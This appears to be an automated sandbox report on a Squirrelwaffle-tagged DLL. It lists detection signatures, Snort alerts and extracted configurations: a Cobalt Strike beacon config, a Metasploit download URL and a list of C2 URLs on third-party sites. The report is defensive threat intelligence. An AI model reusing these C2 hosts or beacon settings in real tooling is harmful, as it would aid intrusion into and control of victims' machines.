Windows Analysis Report p2SijKiqgZ.dll

Overview

General Information

Sample Name: p2SijKiqgZ.dll
Analysis ID: 491706
MD5: 803768a34f7e59b8a9a2f3969624c47e
SHA1: 09a38940ef023929897fdc9c996de0b0f39116e2
SHA256: 2a0a88a2e5f9cafa10a48d63bdfcdf965b72c25978ab46cf28e795dbedc9624a
Tags: dllSquirrelwaffle
Infos:

Most interesting Screenshot:

Detection

CobaltStrike Metasploit Squirrelwaffle
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Squirrelwaffle
Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Yara signature match
One or more processes crash
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Adds / modifies Windows certificates
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp Malware Configuration Extractor: Metasploit {"Headers": "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://23.82.140.206/jquery-3.3.1.slim.min.js"}
Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 8080, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "C2Server": "tuxsecuritybiness.com,/jquery-3.3.1.min.js,23.82.140.206,/jquery-3.3.1.min.js", "HttpPostUri": "/jquery-3.3.2.min.js", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
Source: 3.0.rundll32.exe.45a0000.7.unpack Malware Configuration Extractor: Squirrelwaffle {"C2 urls": ["acdlimited.com/2u6aW9Pfe", "jornaldasoficinas.com/ZF8GKIGVDupL", "orldofjain.com/lMsTA7tSYpe", "altayaralsudani.net/SSUsPgb7PHgC", "hoteloaktree.com/QthLWsZsVgb", "aterwellnessinc.com/U7D0sswwp", "sirifinco.com/Urbhq9wO50j", "ordpress17.com/5WG6Z62sKWo", "mohsinkhanfoundation.com/pcQLeLMbur", "lendbiz.vn/xj3BhHtMbf", "geosever.rs/ObHP1CHt", "nuevainfotech.com/xCNyTjzkoe", "dadabhoy.pk/m6rQE94U", "111", "sjgrand.lk/zvMYuQqEZj", "erogholding.com/GFM1QcCFk", "armordetailing.rs/lgfrZb4Re6WO", "lefrenchwineclub.com/eRUGdDox"]}
Multi AV Scanner detection for submitted file
Source: p2SijKiqgZ.dll ReversingLabs: Detection: 15%
Antivirus detection for URL or domain
Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfw Avira URL Cloud: Label: malware
Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.js Avira URL Cloud: Label: malware
Source: https://tuxsecuritybiness.com:8080/ Avira URL Cloud: Label: malware
Source: tuxsecuritybiness.com Avira URL Cloud: Label: malware
Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.com Avira URL Cloud: Label: malware
Source: https://tuxsecuritybiness.com/v Avira URL Cloud: Label: malware
Source: https://tuxsecuritybiness.com/ Avira URL Cloud: Label: malware
Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVw Avira URL Cloud: Label: malware

Compliance:

barindex
Uses 32bit PE files
Source: p2SijKiqgZ.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.259967612.0000000004F0D000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: version.pdb} source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb{ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbt source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbc source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: vcruntime140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbe source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb# source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbw source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbi source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Administrator\source\repos\Dll1\Release\Dll1.pdb source: loaddll32.exe, 00000000.00000002.518246060.0000000002A70000.00000040.00000001.sdmp, rundll32.exe
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb_ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp

Spreading:

barindex
Contains functionality to get notified if a device is plugged in / out
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00968B24 FreeLibrary,UnregisterDeviceNotification, 3_2_00968B24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009452FC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_009452FC

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49751
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49751
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49754
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49754
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49756
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49756
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49762
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49762
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49764
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49764
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49765
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49765
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49768
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49768
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49770
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49770
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49772
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49772
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49774
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49774
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49776
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49776
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49777
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49777
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49778
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49778
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49780
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49780
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49781
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49781
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49783
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49783
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49785
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49785
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49787
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49787
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49789
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49789
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49790
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49790
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49792
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49792
Source: Traffic Snort IDS: 2018316 ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.7:58498
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49794
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49794
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49796
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49796
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49798
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49798
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49800
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49800
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49802
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49802
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49804
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49804
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49806
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49806
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49810
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49810
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49811
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49811
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49813
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49813
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49815
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49815
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49817
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49817
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49819
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49819
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49821
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49821
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49822
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49822
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49824
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49824
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49826
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49826
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49828
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49828
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49830
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49830
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49832
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49832
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49834
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49834
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49836
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49836
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49837
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49837
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49839
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49839
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49842
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49842
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49844
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49844
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49847
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49847
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49850
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49850
Source: Traffic Snort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49852
Source: Traffic Snort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49852
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: acdlimited.com/2u6aW9Pfe
Source: Malware configuration extractor URLs: jornaldasoficinas.com/ZF8GKIGVDupL
Source: Malware configuration extractor URLs: orldofjain.com/lMsTA7tSYpe
Source: Malware configuration extractor URLs: altayaralsudani.net/SSUsPgb7PHgC
Source: Malware configuration extractor URLs: hoteloaktree.com/QthLWsZsVgb
Source: Malware configuration extractor URLs: aterwellnessinc.com/U7D0sswwp
Source: Malware configuration extractor URLs: sirifinco.com/Urbhq9wO50j
Source: Malware configuration extractor URLs: ordpress17.com/5WG6Z62sKWo
Source: Malware configuration extractor URLs: mohsinkhanfoundation.com/pcQLeLMbur
Source: Malware configuration extractor URLs: lendbiz.vn/xj3BhHtMbf
Source: Malware configuration extractor URLs: geosever.rs/ObHP1CHt
Source: Malware configuration extractor URLs: nuevainfotech.com/xCNyTjzkoe
Source: Malware configuration extractor URLs: dadabhoy.pk/m6rQE94U
Source: Malware configuration extractor URLs: 111
Source: Malware configuration extractor URLs: sjgrand.lk/zvMYuQqEZj
Source: Malware configuration extractor URLs: erogholding.com/GFM1QcCFk
Source: Malware configuration extractor URLs: armordetailing.rs/lgfrZb4Re6WO
Source: Malware configuration extractor URLs: lefrenchwineclub.com/eRUGdDox
Source: Malware configuration extractor URLs: http://23.82.140.206/jquery-3.3.1.slim.min.js
Source: Malware configuration extractor URLs: tuxsecuritybiness.com
